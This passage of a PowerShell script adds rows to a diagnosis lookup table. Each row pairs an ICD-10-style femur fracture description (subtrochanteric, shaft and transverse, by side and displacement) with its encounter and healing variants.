femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced subtrochanteric fracture of unspecified femur","Displaced subtrochanteric fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of right femur","Nondisplaced subtrochanteric fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of left femur","Nondisplaced subtrochanteric fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced subtrochanteric fracture of unspecified femur","Nondisplaced subtrochanteric fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right femur","Unspecified fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left femur","Unspecified fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified femur","Unspecified fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right femur","Displaced transverse fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left femur","Displaced transverse fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified femur","Displaced transverse fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right femur","Nondisplaced transverse fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced 